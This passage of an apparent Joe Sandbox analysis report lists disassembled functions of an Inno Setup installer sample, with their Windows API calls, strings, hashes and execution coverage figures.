                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$EnableItemSystem
                                                                          • String ID: CurPageChanged
                                                                          • API String ID: 3692539535-2490978513
                                                                          • Opcode ID: 02cdd856f79da87946ce3be0036284d170d79325171fd6f69fc8e8dc4402c0b0
                                                                          • Instruction ID: ce10d549b0c21605a6af546479ee9e12edac585882682887e1d5a1eed24c9042
                                                                          • Opcode Fuzzy Hash: 02cdd856f79da87946ce3be0036284d170d79325171fd6f69fc8e8dc4402c0b0
                                                                          • Instruction Fuzzy Hash: E5A10734700104DFD711DB69D985EAD77F5EF89304F2640BAE8049B362EB39AE41DB49
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004248B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 004248D5
                                                                          • WaitMessage.USER32(00000000,004249C9,?,?,?,?), ref: 004249A9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CursorMessageWait
                                                                          • String ID: )I
                                                                          • API String ID: 4021538199-2943873603
                                                                          • Opcode ID: bb51d86f2fc56d9b79fd6e24fc7d3904fa82574d4d9fbf57c4ed1671c248813e
                                                                          • Instruction ID: 3684f1357379c85a98af1ae3a8e7e482b9cd7f2697edbb5586c2bc0712e370a9
                                                                          • Opcode Fuzzy Hash: bb51d86f2fc56d9b79fd6e24fc7d3904fa82574d4d9fbf57c4ed1671c248813e
                                                                          • Instruction Fuzzy Hash: 5D31D4B07002249BCB21EF39D48179FB7B5EFC8304F96456AEC049B385DB789D80CA99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0044F800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044F895
                                                                          • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044F8C6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ExecuteMessageSendShell
                                                                          • String ID: open
                                                                          • API String ID: 812272486-2758837156
                                                                          • Opcode ID: 39befbd8bfe4d04ca9f0ad22fe8eee91a23e6983e02579a401e517ae9ce6b0ad
                                                                          • Instruction ID: 7c1a3c7c8ebbf10466e07294f195938a80af8ea232d4303b03533db3f0a8dc42
                                                                          • Opcode Fuzzy Hash: 39befbd8bfe4d04ca9f0ad22fe8eee91a23e6983e02579a401e517ae9ce6b0ad
                                                                          • Instruction Fuzzy Hash: ED213270E00644AFEB00EF69C881A9EB7F8EB44704F60857BF501FB391D7789A498A58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004686F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Failed to proceed to next wizard page; showing wizard., xrefs: 004687E1
                                                                          • Failed to proceed to next wizard page; aborting., xrefs: 004687CD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                          • API String ID: 0-1974262853
                                                                          • Opcode ID: cfba3478a7359d3cbe5014acf16baf13cc054a1082433b199a19fc1bb0af4262
                                                                          • Instruction ID: f19096d41c4aac5864f1bb8ccf8968ed334c7e4c4402baa3f8ad6812cbe3c8f9
                                                                          • Opcode Fuzzy Hash: cfba3478a7359d3cbe5014acf16baf13cc054a1082433b199a19fc1bb0af4262
                                                                          • Instruction Fuzzy Hash: 2621B074A04204AFD701EBA9D985E99B7F4EF45315F2541BBF404AB392EB38AE40CB1D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00453A00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00453A94
                                                                          • GetLastError.KERNEL32(0000003C,00000000,00453ADD,?,?,00000001,00000001), ref: 00453AA5
                                                                            • Part of subcall function 004536EC: WaitForInputIdle.USER32(00000001,00000032), ref: 00453718
                                                                            • Part of subcall function 004536EC: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 0045373A
                                                                            • Part of subcall function 004536EC: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00453749
                                                                            • Part of subcall function 004536EC: CloseHandle.KERNEL32(00000001,00453776,0045376F,?,00000031,00000080,00000000,?,?,00453AC7,00000080,0000003C,00000000,00453ADD), ref: 00453769
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Wait$CloseCodeErrorExecuteExitHandleIdleInputLastMultipleObjectsProcessShell
                                                                          • String ID: <
                                                                          • API String ID: 35504260-4251816714
                                                                          • Opcode ID: 5d562b07ccb6d432d664981823a10e5781889d8990a1d6319f014274b2d54e6a
                                                                          • Instruction ID: 731c30c279f4aac689e5cd79ec505c098efd6bab46e48a29a8149d1d071dcc10
                                                                          • Opcode Fuzzy Hash: 5d562b07ccb6d432d664981823a10e5781889d8990a1d6319f014274b2d54e6a
                                                                          • Instruction Fuzzy Hash: 862186B0600249EFDB10DF65D88269E7BE8EF04346F50443AF840E7381D7789E49CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(00494420,00000000,)), ref: 004025C7
                                                                          • RtlLeaveCriticalSection.KERNEL32(00494420,0040263D), ref: 00402630
                                                                            • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(00494420,00000000,00401A82,?,?,0040222E,021771FC,00001B1C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                            • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(00494420,00494420,00000000,00401A82,?,?,0040222E,021771FC,00001B1C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                            • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,00494420,00000000,00401A82,?,?,0040222E,021771FC,00001B1C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                            • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(00494420,00401A89,00000000,00401A82,?,?,0040222E,021771FC,00001B1C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                          • String ID: )
                                                                          • API String ID: 2227675388-1084416617
                                                                          • Opcode ID: a331b4afa8f9150ecfd6d625d08057cf3307c320ac16a2d40e23e2d78c6b5bf2
                                                                          • Instruction ID: cb504dffcee3235a55bc4261ddae651f31054f91a8da10d6123b862062c9523b
                                                                          • Opcode Fuzzy Hash: a331b4afa8f9150ecfd6d625d08057cf3307c320ac16a2d40e23e2d78c6b5bf2
                                                                          • Instruction Fuzzy Hash: A71101317042046FEB25AB799F1AB2A6AD4D7D575CB24087FF404F36D2D9BD8C02826C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00490A4E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00490A87
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window
                                                                          • String ID: /INITPROCWND=$%x $@
                                                                          • API String ID: 2353593579-4169826103
                                                                          • Opcode ID: cb4eaf9d1a0e90ba4be06c901a3c5ec9da01a08ec724fec4d2fbca150f0c6e2b
                                                                          • Instruction ID: 8fbfb881858f58605f6fc747a7b473234afd2d79c1019554ad0381eeacbb4dac
                                                                          • Opcode Fuzzy Hash: cb4eaf9d1a0e90ba4be06c901a3c5ec9da01a08ec724fec4d2fbca150f0c6e2b
                                                                          • Instruction Fuzzy Hash: 1611AF71A043099FDF05EBA4D841BAEBFF8EB59318F11447BE504E7281D63CAA05CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00446CA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • SysFreeString.OLEAUT32(?), ref: 00446D5A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocByteCharFreeMultiWide
                                                                          • String ID: NIL Interface Exception$Unknown Method
                                                                          • API String ID: 3952431833-1023667238
                                                                          • Opcode ID: ee7019810a410abba18dc0100b1505424b4d32fb8a75e66193451ab1ec3a4339
                                                                          • Instruction ID: b72a7a67dd3218f0a3ff88df64177c3b524228aef2acc9d842c2d5e561a8356e
                                                                          • Opcode Fuzzy Hash: ee7019810a410abba18dc0100b1505424b4d32fb8a75e66193451ab1ec3a4339
                                                                          • Instruction Fuzzy Hash: 281196B0B042489FDB10DFA58D52AAEBBBCEB49704F51407AF500E7681D6799D04CA6A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004902C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00490388,?,0049037C,00000000,00490363), ref: 0049032E
                                                                          • CloseHandle.KERNEL32(004903C8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00490388,?,0049037C,00000000), ref: 00490345
                                                                            • Part of subcall function 00490218: GetLastError.KERNEL32(00000000,004902B0,?,?,?,?), ref: 0049023C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorHandleLastProcess
                                                                          • String ID: PI
                                                                          • API String ID: 3798668922-693334235
                                                                          • Opcode ID: 134415cf5764304d7a85ffb8c38d9270039f25a4b86aed9810cf5e7e1bec3561
                                                                          • Instruction ID: 4ee4de2afa315c5d3ad3dcaece3c94236d659781de1454245e5c0a060b0d81db
                                                                          • Opcode Fuzzy Hash: 134415cf5764304d7a85ffb8c38d9270039f25a4b86aed9810cf5e7e1bec3561
                                                                          • Instruction Fuzzy Hash: 380161B1604648AFDF10DBE1DC82E9FBBACEF48714F51007AB904E7291D6785E048A28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042DB9C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DBB0
                                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DBF0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Value$EnumQuery
                                                                          • String ID: Inno Setup: No Icons
                                                                          • API String ID: 1576479698-2016326496
                                                                          • Opcode ID: 6a1cd3006789d3206220bad9523abcb9a55dd1f6e807552613f35ce7fa4689f1
                                                                          • Instruction ID: d0cbb6ba2be1033d78bdf391082c57df80f69eea6018bcbf63f776eb2494bfb3
                                                                          • Opcode Fuzzy Hash: 6a1cd3006789d3206220bad9523abcb9a55dd1f6e807552613f35ce7fa4689f1
                                                                          • Instruction Fuzzy Hash: 5A018431B8933069F73085266D41B6B558C9B46B64F65003BFA41AA3C0D6DCDC44E26A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00455040 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00455055
                                                                          • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 004550E7
                                                                          Strings
                                                                          • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00455081
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)
                                                                          • API String ID: 3850602802-809544686
                                                                          • Opcode ID: 435dea47ab134ee9c233c790085fa77e26bfbdb6ab2bddbea41995d2dc1bd5d4
                                                                          • Instruction ID: 32b2d8f4ecb8be4c0db4edd04b2ba3825a47f3f95082eca841b8c31c2652d296
                                                                          • Opcode Fuzzy Hash: 435dea47ab134ee9c233c790085fa77e26bfbdb6ab2bddbea41995d2dc1bd5d4
                                                                          • Instruction Fuzzy Hash: DF11E5B12042805BD300AB6DDC92F6B7B989BD1708F05803AFA85DF2D2C3794805C7AA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0049171E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00453D4C: GetCurrentProcess.KERNEL32(00000028), ref: 00453D5B
                                                                            • Part of subcall function 00453D4C: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00453D61
                                                                          • SetForegroundWindow.USER32(?), ref: 00491750
                                                                          Strings
                                                                          • Restarting Windows., xrefs: 0049172D
                                                                          • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 0049177B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                          • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                          • API String ID: 3179053593-4147564754
                                                                          • Opcode ID: 37e7ebe001a7a212cde58e6dd306762509c171bb9304b2fdbc30566b2ae3f974
                                                                          • Instruction ID: 8093b4a282ce56f34fca2c4e27c1e82005ec878bca3fe8f1f990b5ec0d5489bc
                                                                          • Opcode Fuzzy Hash: 37e7ebe001a7a212cde58e6dd306762509c171bb9304b2fdbc30566b2ae3f974
                                                                          • Instruction Fuzzy Hash: 9D0188746042866BEB01EBA5E451F9C2BF99754309F5040BBF400672E3DA7C994A871D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00470EF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00494628,00492509,00000000,0049255E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00470F4E
                                                                            • Part of subcall function 00470DA0: GetLastError.KERNEL32(00000000,00470E8C,?,?,?,00495090,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00470F13,00000001), ref: 00470DC1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: File$DeleteErrorLastMove
                                                                          • String ID: DeleteFile$MoveFile
                                                                          • API String ID: 3195829115-139070271
                                                                          • Opcode ID: db37762c13f4d93e70656b80c95a1045161ff295cb5d74cedc87cd46e1c3362d
                                                                          • Instruction ID: 5dbbe8a549c9c9cfc1e93233b16d66570ebc39fdbd933c087ed96991ed48964b
                                                                          • Opcode Fuzzy Hash: db37762c13f4d93e70656b80c95a1045161ff295cb5d74cedc87cd46e1c3362d
                                                                          • Instruction Fuzzy Hash: 3FF04FA0202200D6DA307A6AD5426DA77888F0135DB50C07BF988AB3C6CABD9C4586AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00421C98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFocus.USER32(00000000,)I,00000000,004219E4,00000000,00000000,00418568,00000000,00000001,?,?,004618B2,00000001,00000000,00000000,00466C49), ref: 00421CBB
                                                                          • GetFocus.USER32 ref: 00421CC9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Focus
                                                                          • String ID: )I
                                                                          • API String ID: 2734777837-2943873603
                                                                          • Opcode ID: 0a10acb4e0d9c74637569f7b0a18baba00a92d22fcb4ca2a7c7c7526fd4ed3d2
                                                                          • Instruction ID: 6a781247274b35bf802f0d5c88fcb4425cf39f3bc7fec05fcedd95d7989a6849
                                                                          • Opcode Fuzzy Hash: 0a10acb4e0d9c74637569f7b0a18baba00a92d22fcb4ca2a7c7c7526fd4ed3d2
                                                                          • Instruction Fuzzy Hash: ADE09A35B002205ACB1027BA6886BAB21844B64348F58957FB501EB353DD7C8C80068C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403344 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(00000000,0049293A), ref: 0040334B
                                                                          • GetCommandLineA.KERNEL32(00000000,0049293A), ref: 00403356
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CommandHandleLineModule
                                                                          • String ID: H6c
                                                                          • API String ID: 2123368496-3698304253
                                                                          • Opcode ID: 016f57816537cb53ee0d22fead2d74d1c6c49dfd7bcaddc35502ccb39479f9fa
                                                                          • Instruction ID: 6c134d8f911d6f86227fe2926812c1aaae8294de158ab29e80a48ca6d96688b2
                                                                          • Opcode Fuzzy Hash: 016f57816537cb53ee0d22fead2d74d1c6c49dfd7bcaddc35502ccb39479f9fa
                                                                          • Instruction Fuzzy Hash: 00C002609052058AD750AFB5D856F152A949795349F80447FB204B61E1D67C82065BDD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00453DDC Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastSleep
                                                                          • String ID:
                                                                          • API String ID: 1458359878-0
                                                                          • Opcode ID: 38b3aa0fdc7cf286ae7908819d82f9e16bc075767d4286dc2cbeeb2193c7130c
                                                                          • Instruction ID: 12fd24ff74408153868fcfa923be8ac64c8e349910a1f425c594e0bb2a7a610d
                                                                          • Opcode Fuzzy Hash: 38b3aa0fdc7cf286ae7908819d82f9e16bc075767d4286dc2cbeeb2193c7130c
                                                                          • Instruction Fuzzy Hash: 5CF02B32B04514974F30ADAE98C766FA2DCEA813E7710452BFD08D7303D538DE0986A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:7.4%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:4.7%
                                                                          Total number of Nodes:448
                                                                          Total number of Limit Nodes:13
